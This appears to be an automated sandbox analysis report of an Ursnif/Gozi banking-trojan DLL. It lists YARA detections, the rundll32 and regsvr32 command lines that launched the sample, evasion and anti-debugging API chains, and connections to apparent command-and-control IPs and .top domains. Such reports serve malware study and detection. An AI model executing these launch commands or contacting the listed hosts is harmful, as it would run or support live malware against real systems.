Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002284	0_2_10002284
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF82FC	3_2_02AF82FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF2792	3_2_02AF2792
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF2DCC	3_2_02AF2DCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E382FC	4_2_02E382FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E32DCC	4_2_02E32DCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E32792	4_2_02E32792
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E82FC	5_2_045E82FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E2DCC	5_2_045E2DCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E2792	5_2_045E2792

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_10001000
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001BA8 GetProcAddress,NtCreateSection,memset,	0_2_10001BA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001D37 NtMapViewOfSection,	0_2_10001D37
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100024A5 NtQueryVirtualMemory,	0_2_100024A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_02AF737C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF8521 NtQueryVirtualMemory,	3_2_02AF8521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E3737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_02E3737C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E38521 NtQueryVirtualMemory,	4_2_02E38521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	5_2_045E737C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E8521 NtQueryVirtualMemory,	5_2_045E8521

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: ursnif_IAT_corrected.exe.dll

Virustotal: Detection: 55%

Source: ursnif_IAT_corrected.exe.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@10/0@8/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02AF7256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_02AF7256

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5520:120:WilError_01

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002220 push ecx; ret	0_2_10002229
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002273 push ecx; ret	0_2_10002283
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF82EB push ecx; ret	3_2_02AF82FB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AFB859 push 0000006Fh; retf	3_2_02AFB85C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF7F00 push ecx; ret	3_2_02AF7F09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E382EB push ecx; ret	4_2_02E382FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E3B859 push 0000006Fh; retf	4_2_02E3B85C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02E37F00 push ecx; ret	4_2_02E37F09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045EB859 push 0000006Fh; retf	5_2_045EB85C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E82EB push ecx; ret	5_2_045E82FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_045E7F00 push ecx; ret	5_2_045E7F09

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100015BD LoadLibraryA,GetProcAddress,

0_2_100015BD

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
Source: Yara match	File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking system information)

Source: C:\Windows\System32\loaddll32.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

graph_0-619

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWs
Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Windows\System32\loaddll32.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

graph_0-619

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100015BD LoadLibraryA,GetProcAddress,

0_2_100015BD

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 62.173.145.183 80	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: onlinetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 31.41.44.194 80	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: linetwork.top

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_10001000

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02AF54EC cpuid

3_2_02AF54EC

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001C65 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_10001C65

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000204A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_1000204A

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_02AF54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_02AF54EC

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
Source: Yara match	File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
